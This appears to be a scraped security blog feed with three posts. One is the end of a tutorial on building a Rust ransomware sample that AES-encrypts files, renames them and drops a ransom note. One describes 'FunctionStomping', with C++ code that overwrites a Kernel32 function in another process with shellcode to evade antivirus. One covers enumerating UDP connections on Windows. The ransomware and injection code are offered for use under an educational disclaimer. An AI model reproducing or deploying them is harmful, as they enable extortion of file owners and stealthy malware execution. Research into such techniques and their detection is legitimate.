            let new_filename = format!("{}.rustsomware", file_name);
            fs::rename(file_name, new_filename).unwrap();
        }

        "decrypt" => {
            println!("[*] Decrypting {}", file_name);
            let decrypted = cipher.cbc_decrypt(iv, &fs::read(file_name).unwrap());
            fs::write(file_name, decrypted).unwrap();
            let new_filename = file_name.replace(".rustsomware", "");
            fs::rename(file_name, new_filename).unwrap();
        }

        _ => { 
            println!("[-] Invalid action!");
            return false 
        }
    }

    return true;
}

You can use the key and IV from above or generate them yourself. The code above is a simple example of how to use AES128 with Rust, pretty simple right?

As you saw, Rust has a simple interface with the file system that allows you to rename and do io operations easily. Because this is a simple example the function returns a boolean type but it is recommended to return the error to the calling function for further handling.

Part 4 - Adding pretty prints and README file

Just like any good ransomware we need to do a simple thing and add a README file. For the sake of learning, we will learn about including files statically to our binary. Create a readme.txt file with your ransom message in it (it is recommended to create it in a separate directory inside your project directory but you can also put it in the src directory). To add the file, all we need to do is to use the include_str! macro (everything that ends with ! in rust is a macro) and save it to a variable.

...

// Dropping the README.txt file.
let ransom_message = include_str!("../res/README.txt");
let readme_path = format!("{}/README_Rustsomware.txt", args[2].clone());
fs::write(readme_path, ransom_message).unwrap();

As you saw, we can just save it to a file and if we want to do any changes just change the README file and recompile, no code editing is required.

Result: result

Conclusion

In this blog post, you got a taste of Rust’s power and had fun with it by creating a simple program. I think that in the future we will see more and more infosec tools that are written in Rust. The whole code is available on my GitHub, for any questions feel free to ask me on Twitter.

Disclaimer

I’m not responsible for any damage that may occur to your computer. This article is just for educational purposes and is not intended to be used in any other way.

The good, the bad and the stomped function

28 January 2022 at 00:00

star fork follow

Introduction

When I first heard about ModuleStomping I was charmed since it wasn’t like any other known injection method.

Every other injection method has something in common: They use VirtualAllocEx to allocate a new space within the process, and ModulesStomping does something entirely different: Instead of allocating new space in the process, it stomps an existing module that will load the malicious DLL.

After I saw that I started to think: How can I use that to make an even more evasive change that won’t trigger the AV/EDR or won’t be found by the injection scanner?

The answer was pretty simple: Stomp a single function! At the time I thought it is a matter of hours to make this work, but I know now that it took me a little while to solve all the problems.

How does a simple injection look like

The general purpose of any injection is to evade anti-viruses and EDRs and be able to deliver or execute malware.

For all of the injection methods, you need to open a process with PROCESS_ALL_ACCESS permission (or a combination of permissions that allow you to spawn a thread, write and read the process’ memory).

since the injector needs to perform high-privilege operations such as writing to the memory of the process and executing the shellcode remotely. To be able to get PROCESS_ALL_ACCESS you either need that the injected process will run under your user’s context or need to have a high-privileged user running in a high-privileged context (you can read more about UAC and what is a low privileged and high-privileged admin in MSDN) or the injected process is a process that you spawned under your process and therefore have all access.

After we obtain a valid handle with the right permissions we need to allocate space to the shellcode within the remote process virtual memory with VirtualAllocEx. That gives us the space and the address we need for the shellcode to be written. After we have a page with the right permissions and enough space, we can use WriteProcessMemory to write the shellcode into the remote process.

Now, all that’s left to do is to call CreateRemoteThread with the shellcode’s address (that we got from the VirtualAllocEx) to spawn our shellcode in the other process.

To summarize:

shellcode_injection

Research - How and why FunctionStomping works?

For the sake of the POC, I chose to target User32.dll and MessageBoxW. But, unlike the regular way of using GetModuleHandle, I needed to do it remotely. For that, I used the EnumProcessModules function:

enum_process_modules

It looks like a very straightforward function and now all I needed to do is to use the good old GetProcAddress. The implementation was pretty simple: Use GetModuleFileName to get the module’s name out of the handle and then if it is the module we seek (currently User32.dll). If it is, just use GetProcAddress and get the function’s base address.

// Getting the module name.
if (GetModuleFileNameEx(procHandle, currentModule, currentModuleName, MAX_PATH - sizeof(wchar_t)) == 0) {
    std::cerr << "[-] Failed to get module name: " << GetLastError() << std::endl;
    continue;
}

// Checking if it is the module we seek.
if (StrStrI(currentModuleName, moduleName) != NULL) {

    functionBase = (BYTE*)GetProcAddress(currentModule, functionName);
    break;
}

But it didn’t work. I sat by the computer for a while, staring at the valid module handle I got and couldn’t figure out why I could not get the function pointer. At this point, I went back to MSDN and read again the description, and one thing caught my eye:

module_permissions

Well… That explains some things. I searched more about this permission and found this explanation:

load_library_as_datafile

That was very helpful to me because at this moment I knew why even when I have a valid handle, I cannot use GetProcAddress! I decided to change User32.dll and MessageBoxW to other modules and functions: Kernel32.dll and CreateFileW.

If you are wondering why Kernel32.dll and not another DLL, the reason is that Kernel32.dll is always loaded with any file (you can read more about it in the great Windows Internals books) and therefore a reliable target.

And now all that’s left is to write the POC.

POC Development - Final stages

The final step is similar to any other injection method but with one significant change: We need to use VirtualProtectEx with the base address of our function. Usually, in injections, we give set the address parameter to NULL and get back the address that is mapped for us, but since we want to overwrite an existing function we need to give the base address. After WriteProcessMemory is executed, the function is successfully stomped!

// Changing the protection to PAGE_READWRITE for the shellcode.
if (!VirtualProtectEx(procHandle, functionBase, sizeToWrite, PAGE_READWRITE, &oldPermissions)) {
    std::cerr << "[-] Failed to change protection: " << GetLastError() << std::endl;
    CloseHandle(procHandle);
    return -1;
}

SIZE_T written;

// Writing the shellcode to the remote address.
if (!WriteProcessMemory(procHandle, functionBase, shellcode, sizeof(shellcode), &written)) {
    std::cerr << "[-] Failed to overwrite function: " << GetLastError() << std::endl;
    VirtualProtectEx(procHandle, functionBase, sizeToWrite, oldPermissions, &oldPermissions);
    CloseHandle(procHandle);
    return -1;
}

At first, I used PAGE_EXECUTE_READWRITE permission to execute the shellcode but it is problematic (Although even with the PAGE_EXECUTE_READWRITE flag anti-viruses and hollows-hunter still failed to detect it - I wanted to use something else).

Because of that, I checked if there is any other permission that can help with what I wanted: To be able to execute the shellcode and still be undetected. You may ask yourself: “Why not just use PAGE_EXECUTE_READ?”

I wanted to create a single POC and be able to execute any kind of shellcode: Whether it writes to itself or not, and I’m proud to say that I found a solution for that.

I researched further about the available page permissions and one caught my eye: PAGE_EXECUTE_WRITECOPY.

page_execute_write_copy

It looks like it gives read, write and execute permissions without actually using PAGE_EXECUTE_READWRITE. I wanted to dig a little deeper into this and found an article by CyberArk that explains more about this permission and it looked like the fitting solution.

To conclude, the UML of this method looks like that:

function_stomping

Detection

Because many antiviruses failed to identify this shellcode injection technique as malicious I added a YARA signature I wrote so you can import that to your defense tools.

Acknowledgments

UdpInspector - Getting active UDP connections without sniffing

19 August 2021 at 00:00

star fork follow

UdpInspector - Getting active UDP connections without sniffing

Many times I’ve wondered how comes that there are no tools to get active UDP connections. Of course, you can always sniff with Wireshark or any other tool of your choosing but, why Netstat doesn’t have it built in? That is the point that I went on a quest to investigate the matter. Naturally, I started with MSDN to read more about what I can get about UDP connections, and that is the moment when I found these two functions:

So, I started to look at the struct they return and saw a struct named MIB_UDPTABLE.

udptable

Sadly and unsurprisingly it gave no useful information but remember this struct - It will be used in the future. This is when I started to check another path - Reverse Engineering Netstat.

I will tell you that now - It wasn’t helpful at all, but I did learn about a new undocumented function - Always good to know! When I opened Netstat I searched for the interesting part - How it gets the UDP connections? Maybe it uses a special function that would help me as well.

netstatudpfunction

After locating the area where it calls to get the UDP connections I saw that weird function: InternalGetUdpTableWithOwnerModule.

InternalGetUdpTableWithOwnerModule

After a quick check on Google, I saw that it won’t help me, there isn’t much documentation about it. After I realized that it won’t help I went back to the source: The GetExtendedUdpTable function.

After rechecking it I found out that it gives also the PIDs of the processes that communicate in UDP. That is the moment when I understood and built a baseline of what will be my first step in solving the problem: GetExtendedUdpTable and then get the socket out of the process. But it wasn’t enough. I needed somehow to iterate and locate the socket that the process holds. After opening process explorer I saw something unusual - I excepted to see something like \device\udp or \device\tcp but I saw instead a weird \device\afd. After we duplicated the socket we are one step from the entire solution: What is left is to extract the remote address and port. Confusingly, the function that needs to use is getsockname and not getpeername - Although the getpeername function theoretically should be used.

Summing up, these are the steps that you need to apply to do it:

  • Get all the PIDs that are currently communicating via UDP (via GetExtendedUdpTable)

  • Enumerate the PIDs and extract their handles table (NtQueryInformation, NtQueryObject)

  • Duplicate the handle to the socket (identified with \Device\Afd)

  • Extract from the socket the remote address

❌
❌